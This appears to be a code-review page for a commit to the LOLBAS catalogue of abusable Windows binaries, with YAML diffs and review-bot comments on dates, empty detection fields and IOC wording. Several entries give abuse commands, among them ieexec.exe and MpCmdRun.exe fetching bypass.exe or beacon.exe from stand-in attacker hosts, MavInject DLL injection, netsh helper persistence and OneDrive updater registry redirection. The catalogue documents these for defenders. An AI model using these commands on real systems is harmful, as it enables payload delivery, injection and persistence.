||||
- Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
|
||||
Detection:
|
||||
Detection:
|
||||
- IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
|
||||
Resources:
|
||||
- Link: https://www.sothis.tech/author/jgalvez/
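Review bot: The `Created: 2019-12-27` fix replaces a value that was the author's name, which is correct, but like the rest of the commit it is unquoted and YAML 1.1 loaders will read it as a Date rather than a string. The IOC `Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com` states the benign baseline without the rule it implies; suggest `- IOC: GfxDownloadWrapper.exe with a URL argument whose host is not gameplayapi.intel.com, or writing a destination file that is not .json`. The Full_Path list this section's second hunk sits in starts before the hunk.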
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Gpscript.exe
|
||||
Description: Used by group policy to process scripts
|
||||
Description: Used by group policy to process scripts
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Gpscript /logon
|
||||
Description: Executes logon scripts configured in Group Policy.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\gpscript.exe
|
||||
- Path: C:\Windows\SysWOW64\gpscript.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Scripts added in local group policy
|
||||
@ -33,4 +33,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Hh.exe
|
||||
Description: Binary used for processing chm files in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: HH.exe http://some.url/script.ps1
|
||||
Description: Open the target PowerShell script with HTML Help.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\hh.exe
|
||||
- Path: C:\Windows\SysWOW64\hh.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: hh.exe should normally not be in use on a normal workstation
|
||||
@ -32,4 +32,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Ie4uinit.exe
|
||||
Description:
|
||||
Description:
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ie4uinit.exe -BaseSettings
|
||||
Description: Executes commands from a specially prepared ie4uinit.inf file.
|
||||
@ -17,7 +17,7 @@ Full_Path:
|
||||
- Path: c:\windows\sysWOW64\ie4uinit.exe
|
||||
- Path: c:\windows\system32\ieuinit.inf
|
||||
- Path: c:\windows\sysWOW64\ieuinit.inf
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: ie4uinit.exe loading a inf file from outside %windir%
|
||||
@ -26,4 +26,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Jimmy
|
||||
Handle: '@bohops'
|
||||
---
|
||||
---
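Review bot: `Description:` is empty (null) in the new file; the command and IOC support `Description: Binary used to apply Internet Explorer settings from an ieuinit.inf file`. Also, Full_Path lists the `ieuinit.inf` files alongside the executable paths, whereas every other entry in this commit uses Full_Path only for binaries; either move the .inf paths into the Description or confirm that the site treats Full_Path as free-form.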
|
||||
|
@ -2,9 +2,9 @@
|
||||
Name: Ieexec.exe
|
||||
Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
Category: Download
|
||||
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1105
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1105
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
- Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
|
||||
Description: Downloads and executes bypass.exe from the remote server.
|
||||
Usecase: Download and run attacker code from remote location
|
||||
Category: Execute
|
||||
@ -23,13 +23,13 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
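Review bot: The two commands in this entry are byte-identical (`ieexec.exe http://x.x.x.x:8080/bypass.exe`) and differ only in Category (Download vs Execute), and Detection is still the empty `- IOC:`. If the duplicate is intentional so the binary is indexed under both categories, a `# listed twice on purpose: Download and Execute categories` comment would stop the next cleanup pass merging them; otherwise merge them. For the IOC, the command line is the signal: `- IOC: ieexec.exe with an http or https URL as argument`.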
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Ilasm.exe
|
||||
Description: used for compile c# code into dll or exe.
|
||||
Author: Hai vaknin (lux)
|
||||
Created: 17/03/2020
|
||||
Created: 2020-03-17
|
||||
Commands:
|
||||
- Command: ilasm.exe C:\public\test.txt /exe
|
||||
Description: Binary file used by .NET to compile c# code to .exe
|
||||
@ -11,7 +11,7 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/techniques/T1127/
|
||||
OperatingSystem: Windows 10,7
|
||||
OperatingSystem: Windows 10,7
|
||||
- Command: ilasm.exe C:\public\test.txt /dll
|
||||
Description: Binary file used by .NET to compile c# code to dll
|
||||
Usecase: A description of the usecase
|
||||
@ -22,7 +22,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Resources:
|
||||
- Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt
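Review bot: This entry has no `Detection:` section at all — Code_Sample is followed directly by Resources — while every other entry in this commit carries one, so any consumer that indexes IOCs will silently skip it. Based on the commands, `Detection:` with `- IOC: ilasm.exe executed outside a development workstation, or compiling a .txt input` would fit. The second command's `Usecase: A description of the usecase` is template placeholder text; `Usecase: Compile and run code`, as the Microsoft.Workflow.Compiler entry uses, would be accurate.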
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Infdefaultinstall.exe
|
||||
Description: Binary used to perform installation based on content inside inf files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: InfDefaultInstall.exe Infdefaultinstall.inf
|
||||
Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Infdefaultinstall.exe
|
||||
- Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -25,4 +25,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Kyle Hanslovan
|
||||
Handle: '@kylehanslovan'
|
||||
---
|
||||
---
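Review bot: The `- IOC:` under Detection is still empty; the Description in this hunk says the payload is an SCT executed through scrobj.dll from a crafted INF, so `- IOC: InfDefaultInstall.exe loading scrobj.dll` and `- IOC: InfDefaultInstall.exe run with an .inf file outside %windir%` are directly supported by the entry's own text.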
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Installutil.exe
|
||||
Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
|
||||
Description: Execute the target .NET DLL or EXE.
|
||||
@ -25,7 +25,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -39,4 +39,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
---
|
||||
---
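Review bot: Detection still holds the empty `- IOC:` placeholder, although the command `InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll` is distinctive enough to key on. Suggest `- IOC: InstallUtil.exe executed with /U against an assembly outside a known install location` and `- IOC: InstallUtil.exe with /logfile= and /LogToConsole=false, which suppresses the installer's own logging`.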
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Jsc.exe
|
||||
Description: Binary file used by .NET to compile javascript code to .exe or .dll format
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2019-05-31'
|
||||
Created: 2019-05-31
|
||||
Commands:
|
||||
- Command: jsc.exe scriptfile.js
|
||||
Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
|
||||
@ -25,14 +25,14 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Jsc.exe should normally not run a system unless it is used for development.
|
||||
- IOC: Jsc.exe should normally not run a system unless it is used for development.
|
||||
Resources:
|
||||
- Link: https://twitter.com/DissectMalware/status/998797808907046913
|
||||
- Link: https://www.phpied.com/make-your-javascript-a-windows-exe/
|
||||
Acknowledgement:
|
||||
- Person: Malwrologist
|
||||
Handle: '@DissectMalware'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Makecab.exe
|
||||
Description: Binary to package existing files into a cabinet (.cab) file
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
|
||||
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
|
||||
@ -31,7 +31,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\makecab.exe
|
||||
- Path: C:\Windows\SysWOW64\makecab.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Makecab getting files from Internet
|
||||
@ -41,4 +41,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mavinject.exe
|
||||
Description: Used by App-v in Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
|
||||
Description: Inject evil.dll into a process with PID 3110.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mavinject.exe
|
||||
- Path: C:\Windows\SysWOW64\mavinject.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
|
||||
@ -36,4 +36,4 @@ Acknowledgement:
|
||||
Handle: '@gN3mes1s'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Microsoft.Workflow.Compiler.exe
|
||||
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
|
||||
Author: 'Conor Richard'
|
||||
Created: '2018-10-22'
|
||||
Created: 2018-10-22
|
||||
Commands:
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
|
||||
@ -19,7 +19,7 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows 10S
|
||||
OperatingSystem: Windows 10S
|
||||
- Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
|
||||
Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
|
||||
Usecase: Compile and run code
|
||||
@ -27,10 +27,10 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1127
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1127
|
||||
OperatingSystem: Windows 10S
|
||||
OperatingSystem: Windows 10S
|
||||
Full_Path:
|
||||
- Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
|
||||
@ -53,4 +53,4 @@ Acknowledgement:
|
||||
Handle: '@FortyNorthSec'
|
||||
- Person: Bank Security
|
||||
Handle: '@Bank_Security'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mmc.exe
|
||||
Description: Load snap-ins to locally and remotely manage Windows systems
|
||||
Author: '@bohops'
|
||||
Created: '2018-12-04'
|
||||
Created: 2018-12-04
|
||||
Commands:
|
||||
- Command: mmc.exe -Embedding c:\path\to\test.msc
|
||||
Description: Launch a 'backgrounded' MMC process and invoke a COM payload
|
||||
@ -15,10 +15,10 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mmc.exe
|
||||
- Path: C:\Windows\SysWOW64\mmc.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
||||
Acknowledgement:
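Review bot: The `- IOC:` placeholder is empty although the command `mmc.exe -Embedding c:\path\to\test.msc` gives two signals: the `-Embedding` switch, which per the Description launches MMC backgrounded, and an .msc loaded from a user-controlled path. Suggest `- IOC: mmc.exe started with -Embedding and an .msc outside %windir%\system32`. A second IOC on COM servers registered under HKCU is implied by the linked bohops article title but not shown in the hunk, so confirm it before adding.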
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: MpCmdRun.exe
|
||||
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '09/03/2020'
|
||||
Created: 2020-03-20
|
||||
Commands:
|
||||
- Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
|
||||
Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
|
||||
@ -32,9 +32,9 @@ Full_Path:
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
|
||||
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: MpCmdRun storing data into alternate data streams.
|
||||
- IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
|
||||
- IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
|
||||
@ -54,4 +54,4 @@ Acknowledgement:
|
||||
Handle: ''
|
||||
- Person: Cedric
|
||||
Handle: '@th3c3dr1c'
|
||||
---
|
||||
---
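Review bot: The new `Created: 2020-03-20` does not correspond to the old value `'09/03/2020'`, which reads as 2020-03-09 (dd/mm) or 2020-09-03 (mm/dd) but not the 20th under either convention. Please check the intended date against the file's git history and correct it; the rest of the commit converts dates faithfully (e.g. `28/06/2020` → `2020-06-28` for Desktopimgdownldr). As elsewhere in the commit, the unquoted value will load as a Date rather than a string in YAML 1.1 parsers.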
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Msbuild.exe
|
||||
Name: Msbuild.exe
|
||||
Description: Used to compile and execute code
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msbuild.exe pshell.xml
|
||||
Description: Build and execute a C# project stored in the target XML file.
|
||||
@ -37,7 +37,7 @@ Full_Path:
|
||||
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
|
||||
- Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
|
||||
Code_Sample:
|
||||
- Code:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Msbuild.exe should not normally be executed on workstations
|
||||
Resources:
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msconfig.exe
|
||||
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: Msconfig.exe -5
|
||||
Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
|
||||
@ -14,7 +14,7 @@ Commands:
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msconfig.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
|
||||
Detection:
|
||||
- IOC: mscfgtlc.xml changes in system32 folder
|
||||
@ -24,4 +24,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Pierre-Alexandre Braeken
|
||||
Handle: '@pabraeken'
|
||||
---
|
||||
---
|
||||
|
@ -1,8 +1,8 @@
|
||||
---
|
||||
Name: Msdt.exe
|
||||
Description: Microsoft diagnostics tool
|
||||
Description: Microsoft diagnostics tool
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
|
||||
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
|
||||
@ -23,15 +23,15 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\Msdt.exe
|
||||
- Path: C:\Windows\SysWOW64\Msdt.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
|
||||
Detection:
|
||||
- IOC:
|
||||
- IOC:
|
||||
Resources:
|
||||
- Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
- Link: https://twitter.com/harr0ey/status/991338229952598016
|
||||
Acknowledgement:
|
||||
- Person:
|
||||
- Person:
|
||||
Handle:
|
||||
---
|
||||
---
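Review bot: `- IOC:` with no value under `Detection:`, and `- Person:` / `Handle:` with no value under `Acknowledgement:`, parse as lists containing one mapping whose value is null, not as empty lists, so a consumer that iterates `Detection` gets an entry with `IOC: None` to render. If no indicator is known the clearer form is `Detection: []`, and likewise `Acknowledgement: []` rather than a nameless person; the same empty `- IOC:` / `- Code:` shape is present in the Odbcconf, Pcalua, Pcwrun, Presentationhost, Register-cimprovider, Regsvcs, Rpcping and Rundll32 sections. The twice-printed `Description:` and `Code_Sample:` lines presumably differ only in trailing whitespace, which I cannot confirm from the rendered view.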
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Mshta.exe
|
||||
Description: Used by Windows to execute html applications. (.hta)
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: mshta.exe evilfile.hta
|
||||
Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\mshta.exe
|
||||
- Path: C:\Windows\SysWOW64\mshta.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
|
||||
Detection:
|
||||
- IOC: mshta.exe executing raw or obfuscated script within the command-line
|
||||
@ -48,10 +48,10 @@ Resources:
|
||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
|
||||
- Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
|
||||
- Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
- Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
|
||||
Acknowledgement:
|
||||
- Person: Casey Smith
|
||||
Handle: '@subtee'
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Msiexec.exe
|
||||
Description: Used by Windows to execute msi files
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: msiexec /quiet /i cmd.msi
|
||||
Description: Installs the target .MSI file silently.
|
||||
@ -35,11 +35,11 @@ Commands:
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\msiexec.exe
|
||||
- Path: C:\Windows\SysWOW64\msiexec.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: msiexec.exe getting files from Internet
|
||||
@ -51,4 +51,4 @@ Acknowledgement:
|
||||
Handle: '@netbiosX'
|
||||
- Person: Philip Tsukerman
|
||||
Handle: '@PhilipTsukerman'
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Netsh.exe
|
||||
Description: Netsh is a Windows tool used to manipulate network interface settings.
|
||||
Author: 'Freddie Barr-Smith'
|
||||
Created: '2019-12-24'
|
||||
Created: 2019-12-24
|
||||
Commands:
|
||||
- Command: netsh.exe add helper C:\Users\User\file.dll
|
||||
Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called
|
||||
@ -15,7 +15,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\WINDOWS\System32\Netsh.exe
|
||||
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code:
|
||||
Detection:
|
||||
- IOC: Netsh initiating a network connection
|
||||
@ -32,4 +32,4 @@ Acknowledgement:
|
||||
Handle:
|
||||
- Person: 'Xabier Ugarte-Pedrero'
|
||||
Handle:
|
||||
---
|
||||
---
|
||||
|
@ -2,7 +2,7 @@
|
||||
Name: Odbcconf.exe
|
||||
Description: Used in Windows for managing ODBC connections
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Created: 2018-05-25
|
||||
Commands:
|
||||
- Command: odbcconf -f file.rsp
|
||||
Description: Load DLL specified in target .RSP file. See the Playloads folder for an example .RSP file.
|
||||
@ -23,7 +23,7 @@ Commands:
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\odbcconf.exe
|
||||
- Path: C:\Windows\SysWOW64\odbcconf.exe
|
||||
Code_Sample:
|
||||
Code_Sample:
|
||||
- Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/file.rsp
|
||||
Detection:
|
||||
- IOC:
|
||||
@ -36,4 +36,4 @@ Acknowledgement:
|
||||
Handle: '@subtee'
|
||||
- Person: Adam
|
||||
Handle: '@Hexacorn'
|
||||
---
|
||||
---
|
||||
|
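--- /dev/null
+++ b/yml/OSBinaries/OfflineScannerShell.yml
@@ -0,0 +1,22 @@
+---
+Name: OfflineScannerShell.exe
+Description: Windows Defender Offline Shell
+Author: 'Elliot Killick'
+Created: '2021-08-16'
+Commands:
+- Command: OfflineScannerShell
+Description: Execute mpclient.dll library in the current working directory
+Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
+Category: Execute
+Privileges: Administrator
+MitreID: T1218
+MitreLink: https://attack.mitre.org/wiki/Technique/T1218/
+OperatingSystem: Windows 10
+Full_Path:
+- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
+Detection:
+- IOC: OfflineScannerShell.exe should not be run on a normal workstation
+Acknowledgement:
+- Person: Elliot Killick
+Handle: '@elliotkillick'
+---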
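Review bot: `MitreLink: https://attack.mitre.org/wiki/Technique/T1218/` uses the legacy wiki-style URL, while the other two files added in this commit (OneDriveStandaloneUpdater.yml and PrintBrm.yml) use the current `https://attack.mitre.org/techniques/T1105/` form; for a new entry I would write `MitreLink: https://attack.mitre.org/techniques/T1218/`. The single IOC is generic: since the Description states that the binary executes mpclient.dll from the current working directory, a more actionable indicator would be `- IOC: OfflineScannerShell.exe loading mpclient.dll from a directory other than its own install path`, though I cannot confirm the legitimate load location from this page. The keys under `- Command:` appear at column 0 in the rendered view; the committed file presumably indents them like the existing entries, but that is not visible here.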
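--- /dev/null
+++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml
@@ -0,0 +1,25 @@
+---
+Name: OneDriveStandaloneUpdater.exe
+Description: OneDrive Standalone Updater
+Author: 'Elliot Killick'
+Created: '2021-08-22'
+Commands:
+- Command: OneDriveStandaloneUpdater
+Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json
+Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
+Category: Download
+Privileges: User
+MitreID: T1105
+MitreLink: https://attack.mitre.org/techniques/T1105/
+OperatingSystem: Windows 10
+Full_Path:
+- Path: '%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
+Detection:
+- IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
+- IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files
+Resources:
+- Link: https://github.com/LOLBAS-Project/LOLBAS/pull/153
+Acknowledgement:
+- Person: Elliot Killick
+Handle: '@elliotkillick'
+---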
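Review bot: The `Description:` under `- Command: OneDriveStandaloneUpdater` is one plain scalar of several hundred characters, which any line-length lint will flag and which makes later edits to the registry-value list hard to review; writing it as `Description: >-` with each sentence on its own indented line loads to the identical string while keeping lines short. The first `- IOC:` line is long for the same reason and can use the same folded form. The `Resources:` entry links to the pull request that introduces this file rather than to an external write-up; that is fine if no write-up exists, but it is worth a second look, since the other new entries in this commit link to primary sources.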
@ -2,7 +2,7 @@
|
||||
Name: Pcalua.exe
|
